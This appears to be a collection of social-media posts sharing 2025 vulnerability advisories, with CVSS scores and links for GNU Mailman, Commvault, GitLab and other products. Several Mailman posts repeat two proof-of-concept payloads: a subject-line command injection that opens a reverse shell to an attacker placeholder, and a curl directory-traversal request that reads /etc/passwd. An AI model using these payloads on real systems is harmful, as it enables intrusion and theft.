Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

https://nvd.nist.gov/vuln/detail/CVE-2025-43920

There are a couple more in Mailman while we're here:

https://nvd.nist.gov/vuln/detail/CVE-2025-43921

https://nvd.nist.gov/vuln/detail/CVE-2025-43919

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

https://github.com/0NYX-MY7H/CVE-2025-43920

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

https://nvd.nist.gov/vuln/detail/CVE-2025-43920

There was also a nice ../ to go with it:

https://github.com/0NYX-MY7H/CVE-2025-43919

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

https://nvd.nist.gov/vuln/detail/CVE-2025-43919

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

https://github.com/0NYX-MY7H/CVE-2025-43921

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

https://github.com/0NYX-MY7H/CVE-2025-43920

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

https://nvd.nist.gov/vuln/detail/CVE-2025-43920

There are a couple more in Mailman while we're here:

https://nvd.nist.gov/vuln/detail/CVE-2025-43921

https://nvd.nist.gov/vuln/detail/CVE-2025-43919

ICYMI this weekend:

Command intention via email subject in GNU Mailman as shipped in cPanel. Note the difference of CVSS metrics between the original disclosure and the CNA ( MITRE ).

https://github.com/0NYX-MY7H/CVE-2025-43920

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

PoC: Subject: ;bash -i >& /dev/tcp/ATTACKERIP/4444 0>&1

https://nvd.nist.gov/vuln/detail/CVE-2025-43920

There was also a nice ../ to go with it:

https://github.com/0NYX-MY7H/CVE-2025-43919

Per original disclosure ( it was updated yesterday to reflect the published CVSS ): sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled with cPanel and WHM, contains a critical directory traversal vulnerability in the /mailman/private/mailman endpoint. Unauthenticated attackers can exploit this flaw to read arbitrary files on the server, such as /etc/passwd or Mailman configuration files, due to insufficient input validation in the private.py CGI script. This vulnerability poses significant risks for information disclosure and can facilitate further attacks when combined with other exploits.

PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

https://nvd.nist.gov/vuln/detail/CVE-2025-43919

There's also an "Unauthorized Mailing List Creation in GNU Mailman 2.1.39":

https://github.com/0NYX-MY7H/CVE-2025-43921

If I ran cPanel with Mailman, looking at the advisories themselves, I would treat it with the original CVSS scores in mind rather than the ones provided by MITRE here.

Well if that command injection wasn't enough for you, how about a nice sev:CRIT ../ to go with it? Happy Easter.

https://github.com/0NYX-MY7H/CVE-2025-43919

There's also apparently a "Unauthorized Mailing List Creation in GNU Mailman 2.1.39" but the README on that one appears to be the one for the ../ so I don't have any details.

https://github.com/0NYX-MY7H/CVE-2025-43921

Edit to add the PoC: curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman

#directoryTraversalMemes

Command intention via email subject in GNU Mailman. lol. lmao. It's interesting to see the difference of CVSS metrics between the disclosure and the CNA ( MITRE ).

https://github.com/0NYX-MY7H/CVE-2025-43920

Per discloser: sev:CRIT 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Per CNA: sev:MED 5.4 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N

GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attackers to execute arbitrary OS commands via shell metacharacters in an email Subject line.

https://nvd.nist.gov/vuln/detail/CVE-2025-43920

There are a couple more in Mailman while we're here:

https://nvd.nist.gov/vuln/detail/CVE-2025-43921

https://nvd.nist.gov/vuln/detail/CVE-2025-43919

DoS in tRPC.

https://github.com/trpc/trpc/security/advisories/GHSA-pj3v-9cm8-gvj8

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

tRPC allows users to build & consume fully typesafe APIs without schemas or code generation. In versions starting from 11.0.0 to before 11.1.1, an unhandled error is thrown when validating invalid connectionParams which crashes a tRPC WebSocket server. This allows any unauthenticated user to crash a tRPC 11 WebSocket server. Any tRPC 11 server with WebSocket enabled with a createContext method set is vulnerable. This issue has been patched in version 11.1.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-43855

LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).

https://security-advisory.acronis.com/advisories/SEC-8035

sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

https://nvd.nist.gov/vuln/detail/CVE-2025-30408

https://security-advisory.acronis.com/advisories/SEC-8148

sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

https://nvd.nist.gov/vuln/detail/CVE-2025-30409

I'm tired of soup, but this one is kind of fun.

A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, they mistakenly send the HTTP Authorization header to the new host that the redirection points to. This allows the new host to impersonate the user to the original host that issued the redirect.

https://nvd.nist.gov/vuln/detail/CVE-2025-46421

LPE and DoS in Acronis Cyber Protect Cloud Agent (Windows).

https://security-advisory.acronis.com/advisories/SEC-8035

sev:MED 6.7 - CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

Local privilege escalation due to insecure folder permissions. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

https://nvd.nist.gov/vuln/detail/CVE-2025-30408

https://security-advisory.acronis.com/advisories/SEC-8148

sev:MED 5.5 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Denial of service due to allocation of resources without limits. The following products are affected: Acronis Cyber Protect Cloud Agent (Windows) before build 39904.

https://nvd.nist.gov/vuln/detail/CVE-2025-30409

This SQLi in Centreon Web is from a month ago but the CVE was published today.

https://thewatch.centreon.com/latest-security-bulletins-64/cve-2024-55571-centreon-web-high-severity-4496

sev:HIGH 7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Centreon centreon-web (User configuration form modules) allows SQL Injection.

A user with high privileges is able to become administrator by intercepting the contact form request and altering its payload.

This issue affects Centreon: from 22.10.0 before 22.10.28, from 23.04.0 before 23.04.25, from 23.10.0 before 23.10.20, from 24.04.0 before 24.04.10, from 24.10.0 before 24.10.4.

https://nvd.nist.gov/vuln/detail/CVE-2025-3872

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L

GitLab releases security patches for multiple Vulnerabilities

GitLab has released security updates addressing five vulnerabilities in its Community and Enterprise Editions, including three high-severity cross-site scripting and header injection flaws in the Maven Dependency Proxy (CVE-2025-1763, CVE-2025-2443, CVE-2025-1908), a denial of service vulnerability in issue preview functionality (CVE-2025-0639), and an information disclosure issue allowing unauthorized access to branch names (CVE-2024-12244). Patched versions are 17.11.1, 17.10.5, and 17.9.7.

**If you are running self-hosted GitLab Community Edition (CE) or Enterprise Edition (EE) plan a quick patch cycle. While none of the flaws are scored as critical, the nature of GitLab server is to be visible to many users, probably on the internet. So someone will probably find an exploit scenario given enough time and an unpatched server.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/gitlab-releases-security-patches-for-multiple-vulnerabilities-9-a-u-d-v/gD2P6Ple2L

Hardcoded keys in PHYSEC devices strikes again.

https://jvn.jp/en/jp/JVN84627857/

https://i-pro.com/products_and_solutions/en/surveillance/solutions/technologies/cyber-security/psirt/security-advisories

sev:MED 6.8 - CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool affects the network system for i-PRO Co., Ltd. surveillance cameras and recorders. This vulnerability allows a local authenticated attacker to use the authentication information from the last connected surveillance cameras and recorders.

https://nvd.nist.gov/vuln/detail/CVE-2025-32730

Authenticated Remote Code Execution on USG FLEX H Series (CVE-2025-1731 / CVE-2025-1732) https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732

@Dio9sys @da_667 Adding this link to the Zyxel vuln above: https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731/

Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731) https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731/

Local privilege escalation on Zyxel USG FLEX H Series (CVE-2025-1731)

“So we wait, this is our […]

🔗️ [Humanativaspa] https://link.is.it/ubmq0d

This is one of those CVEs that I think the score is higher than the actual risk to most orgs but IDK, we all have different use cases and configurations.

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/25602

sev:HIGH 8.8 - CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Brocade Fabric OS versions starting with 9.1.0 have root access removed, however, a local user with admin privilege can potentially execute arbitrary code with full root privileges on Fabric OS versions 9.1.0 through 9.1.1d6.

https://nvd.nist.gov/vuln/detail/CVE-2025-1976

Here's an industrial networking vuln for @Dio9sys and @da_667 and whoever.

https://www.westermo.com/-/media/Files/Cyber-security/westermo_sa_25-02_malformed_esp_packet_could_cause_denial_vulnerability_in_weos.pdf?rev=9af5c93194f343a0b4fad2d24d032df2&hash=87F4AD7F74C2BE69CA1B4C24F29B82EA

sev:MED 5.9 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet.

https://nvd.nist.gov/vuln/detail/CVE-2025-46419

SonicWALL SSLVPN DoS.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0009

sev:HIGH 7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office interface allows a remote, unauthenticated attacker to crash the firewall, potentially leading to a Denial-of-Service (DoS) condition.

https://nvd.nist.gov/vuln/detail/CVE-2025-32818

SQLi in XWiki.

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

XWiki is a generic wiki platform. In versions starting from 1.8 and prior to 15.10.16, 16.4.6, and 16.10.1, it is possible for a remote unauthenticated user to escape from the HQL execution context and perform a blind SQL injection to execute arbitrary SQL statements on the database backend, including when "Prevent unregistered users from viewing pages, regardless of the page rights" and "Prevent unregistered users from editing pages, regardless of the page rights" options are enabled. Depending on the used database backend, the attacker may be able to not only obtain confidential information such as password hashes from the database, but also execute UPDATE/INSERT/DELETE queries. This issue has been patched in versions 16.10.1, 16.4.6 and 15.10.16. There is no known workaround, other than upgrading XWiki.

https://nvd.nist.gov/vuln/detail/CVE-2025-32969

How about some BEC routers?

cc: @Dio9sys @da_667

https://nvd.nist.gov/vuln/detail/CVE-2025-2770

https://nvd.nist.gov/vuln/detail/CVE-2025-2771

https://nvd.nist.gov/vuln/detail/CVE-2025-2772

https://nvd.nist.gov/vuln/detail/CVE-2025-2773

How about some BEC routers?

cc: @Dio9sys @da_667

https://nvd.nist.gov/vuln/detail/CVE-2025-2770

https://nvd.nist.gov/vuln/detail/CVE-2025-2771

https://nvd.nist.gov/vuln/detail/CVE-2025-2772

https://nvd.nist.gov/vuln/detail/CVE-2025-2773

How about some BEC routers?

cc: @Dio9sys @da_667

https://nvd.nist.gov/vuln/detail/CVE-2025-2770

https://nvd.nist.gov/vuln/detail/CVE-2025-2771

https://nvd.nist.gov/vuln/detail/CVE-2025-2772

https://nvd.nist.gov/vuln/detail/CVE-2025-2773

How about some BEC routers?

cc: @Dio9sys @da_667

https://nvd.nist.gov/vuln/detail/CVE-2025-2770

https://nvd.nist.gov/vuln/detail/CVE-2025-2771

https://nvd.nist.gov/vuln/detail/CVE-2025-2772

https://nvd.nist.gov/vuln/detail/CVE-2025-2773

Arista NG Firewall XSS -> RCE.

cc: @Dio9sys @da_667

https://www.zerodayinitiative.com/advisories/ZDI-25-181/

sev:HIGH 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Minimal user interaction is required to exploit this vulnerability. The specific flaw exists within the processing of the User-Agent HTTP header. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-24407.

https://nvd.nist.gov/vuln/detail/CVE-2025-2767

This is unlikely to impact anyone, but it's a CVE for Cray OS. In 2025. I like it.

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbcr04838en_us

sev:MED 5.1 -
CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

A vulnerability in the kernel of the Cray Operating System (COS) could allow an attacker to perform a local Denial of Service (DoS) attack.

https://nvd.nist.gov/vuln/detail/CVE-2025-27087

HTTP request smuggling in OpenResty lua-nginx-module. But even if you don't care about that, check out the blog post ( with PoC ). It has a cat that chases the cursor around the screen and I love it so much.

https://www.benasin.space/2025/03/18/OpenResty-lua-nginx-module-v0-10-26-HTTP-Request-Smuggling-in-HEAD-requests/

https://nvd.nist.gov/vuln/detail/CVE-2024-33452

Heads-up if you or your target run IBM Hardware Management Console.

https://www.ibm.com/support/pages/node/7231507

sev:CRIT 9.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands locally due to improper validation of libraries of an untrusted source.

https://nvd.nist.gov/vuln/detail/CVE-2025-1950

https://www.ibm.com/support/pages/node/7231389

sev:HIGH 8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 could allow a local user to execute commands as a privileged user due to execution of commands with unnecessary privileges.

https://nvd.nist.gov/vuln/detail/CVE-2025-1951

Hey @Dio9sys and @da_667 , y'all like sev:CRIT 9.8 vulns in cameras?

https://github.com/Yasha-ops/RCE-YiIOT

https://nvd.nist.gov/vuln/detail/CVE-2025-29659

https://nvd.nist.gov/vuln/detail/CVE-2025-29660

Hey @Dio9sys and @da_667 , y'all like sev:CRIT 9.8 vulns in cameras?

https://github.com/Yasha-ops/RCE-YiIOT

https://nvd.nist.gov/vuln/detail/CVE-2025-29659

https://nvd.nist.gov/vuln/detail/CVE-2025-29660

📊⚠️ Data in danger!

We found an XSS vulnerability in Grafana with the help of SonarQube. Learn about the details in our latest blog post:

https://www.sonarsource.com/blog/data-in-danger-detecting-xss-in-grafana-cve-2025-2703/?utm_medium=social&utm_source=mastodon&utm_campaign=research&utm_content=blog-grafana-xss-2404-&utm_term=---all&s_category=Organic&s_source=Social%20Media&s_origin=social

#appsec #security #vulnerability

Some of y'all use Grafana, right?

https://grafana.com/security/security-advisories/cve-2025-2703

sev:MED 6.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability.

A user with Editor permissions is able to modify such a panel in order to make it execute arbitrary JavaScript.

https://nvd.nist.gov/vuln/detail/CVE-2025-2703

Ooh, more CODESYS.

https://certvde.com/en/advisories/VDE-2025-027/

sev:MED 5.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

An unauthenticated remote attacker can bypass the user management in CODESYS Visualization and read visualization template files or static elements by means of forced browsing.

https://nvd.nist.gov/vuln/detail/CVE-2025-2595

A couple CVEs in Axis Camera Station Pro.

https://www.axis.com/dam/public/e4/2e/b2/cve-2025-1056pdf-en-US-479106.pdf

sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

https://nvd.nist.gov/vuln/detail/CVE-2025-1056

https://www.axis.com/dam/public/9d/fe/3f/cve-2025-0926pdf-en-US-479105.pdf

sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

https://nvd.nist.gov/vuln/detail/CVE-2025-0926

A couple CVEs in Axis Camera Station Pro.

https://www.axis.com/dam/public/e4/2e/b2/cve-2025-1056pdf-en-US-479106.pdf

sev:MED 6.1 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified an issue with a specific file that the server is using. A non-admin user can modify this file to either create files or change the content of files in an admin-protected location.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

https://nvd.nist.gov/vuln/detail/CVE-2025-1056

https://www.axis.com/dam/public/9d/fe/3f/cve-2025-0926pdf-en-US-479105.pdf

sev:MED 5.9 - CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that it is possible for a non-admin user to remove system files causing a boot loop by redirecting a file deletion when recording video.
Axis has released a patched version for the highlighted flaw. Please
refer to the Axis security advisory for more information and solution.

https://nvd.nist.gov/vuln/detail/CVE-2025-0926

While digging into some #Fortinet vulnerabilities, I discovered a set of CVEs that were rejected for being unused.

I'm wondering how this is actually helping vulnerability management. Does this mean those will be never used? or something else?

#vulnerability #cve #vulnerabilities

🔗 https://vulnerability.circl.lu/vuln/cve-2025-46221

Synology again.

https://www.synology.com/en-global/security/advisory/Synology_SA_25_03

sev:HIGH 7.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Missing authorization vulnerability in synocopy in Synology DiskStation Manager (DSM) before 7.1.1-42962-8, 7.2.1-69057-7 and 7.2.2-72806-3 allows remote attackers to read arbitrary files via unspecified vectors.

I assume "unspecified vectors" is code for "basic shit we're too embarrassed to disclose."

https://nvd.nist.gov/vuln/detail/CVE-2025-1021

Go hack cryptocurrency shit.

https://github.com/XRPLF/xrpl.js/security/advisories/GHSA-33qr-m49q-rxfx

sev:CRIT 9.3 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

xrpl.js is a JavaScript/TypeScript API for interacting with the XRP Ledger in Node.js and the browser. Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised and contained malicious code designed to exfiltrate private keys. Version 2.14.2 is also malicious, though it is less likely to lead to exploitation as it is not compatible with other 2.x versions. Anyone who used one of these versions should stop immediately and rotate any private keys or secrets used with affected systems. Users of xrpl.js should pgrade to version 4.2.5 or 2.14.3 to receive a patch. To secure funds, think carefully about whether any keys may have been compromised by this supply chain attack, and mitigate by sending funds to secure wallets, and/or rotating keys. If any account's master key is potentially compromised, disable the key.

https://nvd.nist.gov/vuln/detail/CVE-2025-32965

Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center https://arcticwolf.com/resources/blog/cve-2025-34028/ #cybersecurity #infosec

Arctic Wolf, from yesterday: CVE-2025-34028: PoC Released for Critical RCE Vulnerability in Commvault Command Center https://arcticwolf.com/resources/blog/cve-2025-34028/ #cybersecurity #infosec

Critical Commvault Flaw Rated 10/10: CSA Urges Immediate Patching https://thecyberexpress.com/commvault-vulnerability-cve-2025-34028/ #CommonVulnerabilityScoringSystem #CommvaultVulnerability #TheCyberExpressNews #Vulnerabilities #TheCyberExpress #FirewallDaily #CVE202534028 #CyberNews #CSA

CVE-2025-34028, a maximum-severity #RCE #vulnerability in the Command Center, poses a severe risk to impacted instances and may result in a full system compromise. Detect exploitation attempts with #Sigma rules from SOC Prime Platform.
https://socprime.com/blog/detect-cve-2025-34028-exploitation/?utm_source=mastodon&utm_medium=social&utm_campaign=latest-threats&utm_content=blog-post

Critical vulnerability reported in Commvault Command Center

A critical unauthenticated remote code execution vulnerability (CVE-2025-34028) in Commvault's Command Center allows attackers to force vulnerable systems to download, unzip, and execute malicious code, leading to complete system compromise. The flaw affects Commvault Command Center Innovation Release versions 11.38.0-11.38.19 on both Windows and Linux.

**If you are using Commvault Command Center Innovation Release versions 11.38.0 to 11.38.19, patch IMMEDIATELY. Naturally, make sure the system is isolated from the internet and accessible only from trusted networks. But even with isolation, someone will find your Commvault eventually - through phishing or malware. So don't delay - patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-vulnerability-reported-in-commvault-command-center-5-w-t-6-u/gD2P6Ple2L

Commvault Command Center Path Traversal Vulnerability (CVE-2025-34028) https://fortiguard.fortinet.com/threat-signal-report/6081

CVE-2025-34028 Detection: A Maximum-Severity Vulnerability in the Commvault Command Center Enables RCE – Source: socprime.com https://ciso2ciso.com/cve-2025-34028-detection-a-maximum-severity-vulnerability-in-the-commvault-command-center-enables-rce-source-socprime-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #CVE-2025-34028 #Latestthreats #Vulnerability #socprimecom #socprime #Blog #CVE #rce

New.

WatchTower: Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/

More:

Infosecurity-Magazine: Highest-Risk Security Flaw Found in Commvault Backup Solutions https://www.infosecurity-magazine.com/news/critical-vulnerability-commvault/ #cybersecurity #Infosec

Critical Commvault RCE vulnerability fixed, PoC available (CVE-2025-34028) https://www.helpnetsecurity.com/2025/04/24/critical-commvault-rce-vulnerability-fixed-poc-available-cve-2025-34028/ #dataprotection #vulnerability #Don'tmiss #Commvault #WatchTowr #Hotstuff #backup #News #PoC

Yet another good write-up by watchTowr Labs. This time it was with Commvault. So patch it if you have it, hack it if you don't. And vendors: Take note of the communication and turnaround time in here.

https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/

Edit to fix a dumb typo.

Whoa, that Commvault SSRF to RCE vulnerability is *ugly*! 😬 We're talking CVE-2025-34028, slapped with a 9.0 CVSS score. Yeah, that's definitely setting off all the alarm bells!

Here's the lowdown: An SSRF vulnerability in "deployWebpackage.do" isn't being filtered properly. What does that mean? Attackers can just upload a ZIP file containing a JSP payload, and *boom* – they get remote code execution. It's a stark reminder that backup systems, unfortunately, are often prime targets precisely because they get overlooked.

So, listen up: If you're running Commvault Command Center versions anywhere from 11.38.0 up to 11.38.19, you need to patch immediately. Get yourself onto version 11.38.20 or 11.38.25 right away! And while you're at it, take a good look at your configuration settings. Good news is, watchTowr Labs has put out a detection tool – definitely make use of that!

Just a friendly reminder on best practices, too: Your backup systems absolutely belong in their own, separate network segment. Crucially, regular penetration tests are a must; don't just rely on automated scans, they simply won't cut it for stuff like this. That's just how it is. 🤷

How about you? Got Commvault deployed? Have you already checked your setup against this vulnerability? What kind of hardening measures do you have in place for your backup infrastructure? Drop your thoughts below! 👇

#Cybersecurity #Pentesting #Commvault

Fire In The Hole, We’re Breaching The Vault - Commvault Remote Code Execution (CVE-2025-34028) - watchTowr Labs https://labs.watchtowr.com/fire-in-the-hole-were-breaching-the-vault-commvault-remote-code-execution-cve-2025-34028/

It feels like it's been a while since we've had a perfect 10 ../ and I'm glad we have another one to celebrate. 🥳

https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html

sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H

A path traversal vulnerability in Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files, which, when expanded by the target server, result in Remote Code Execution.

https://nvd.nist.gov/vuln/detail/CVE-2025-34028

Edit for dumb typo.

Authentication bypass vulnerability reported in HPE Performance Cluster Manager (HPCM)

Authentication bypass vulnerability in HPE Performance Cluster Manager (CVE-2025-27086, CVSS 8.1) allows attackers to exploit Remote Method Invocation in the GUI component to gain unauthorized privileged access to affected systems (version 1.12 and earlier). HPE is recommending immediate upgrade to version 1.13 or implementing a temporary mitigation - disabling the vulnerable RMI service.

**If you are running HPE Clusters and are using HPE Performance Cluster Manager, time to patch it ASAP. Although the flaw is not scored as critical, an authentication bypass to the Cluster Manager can be a nasty vector of attack. Naturally, make sure it's only accessible from isolated and trusted networks. Then patch.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/authentication-bypass-vulnerability-reported-in-hpe-performance-cluster-manager-hpcm-n-p-l-d-c/gD2P6Ple2L

Remote auth bypass in HPE Performance Cluster Manager.

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbcr04842en_us

